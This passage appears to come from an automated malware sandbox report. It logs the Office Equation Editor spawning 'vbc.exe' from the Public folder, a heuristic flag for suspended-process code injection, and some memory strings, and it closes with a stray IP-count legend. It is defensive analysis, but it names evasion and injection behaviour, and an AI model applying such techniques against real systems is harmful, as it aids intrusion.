Source: C:\Users\Public\vbc.exe Code function: 6_2_003F3DDD mov eax, dword ptr fs:[00000030h] 6_2_003F3DDD

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000006.00000002.688494156.0000000000920000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.688494156.0000000000920000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.688494156.0000000000920000.00000002.00020000.sdmp Binary or memory string: Program Manager<
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs